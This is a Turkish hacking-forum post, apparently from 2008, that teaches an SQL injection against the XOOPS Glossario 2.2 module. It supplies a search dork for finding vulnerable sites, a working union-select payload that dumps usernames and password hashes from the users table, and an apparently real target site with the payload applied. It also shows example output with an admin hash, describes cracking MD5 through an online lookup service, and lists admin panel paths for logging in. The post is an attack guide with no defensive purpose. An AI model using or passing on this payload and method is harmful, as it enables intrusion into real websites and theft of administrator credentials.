AnasayfaAnasayfa  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

Paylaş | 
 

 Sql Injection - Güncel - Admin Paneline Giris - MD5 Kirmak

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
Rıdvan®
admin
admin
avatar

Mesaj Sayısı : 53
Kayıt tarihi : 16/03/08

MesajKonu: Sql Injection - Güncel - Admin Paneline Giris - MD5 Kirmak   Paz Mart 16, 2008 8:04 am

S.a üstlerim ,
bugün sizlere
XOOPS'daki module Glossario 2.2 SQL Injection acigindan bahs edecegim..

Google Arama

-> allinurl: "modules/glossaires"
Exploiti okuyarak kendi aramanizida yapabilirsiniz tabi


EXPLOITIMIZ ;
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme

Örnek Site ;
http://www.aquasquale.com/V3/modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme


Alıntı:
Définition : -Gun-
Lien associé : bb7a49d6484564eb6c505dc531142fcf

MD5'i kirdiginiz Sitelerde böyle bisey cikar.. GUN olan ADMIN adidir..
32 Haneli olan kod ise (":"isaretinden sonraki) MD5 i dir

www.md5search.org >> SELECT ALL >> MD5'i GIR >> ARA

Admin Panelleri ;
www.site.com/admin
www.site.com/admin.php
www.site.com/administrator
www.site.com/administrator.php
Sayfa başına dön Aşağa gitmek
 
Sql Injection - Güncel - Admin Paneline Giris - MD5 Kirmak
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: WEP HACKİNG-
Buraya geçin: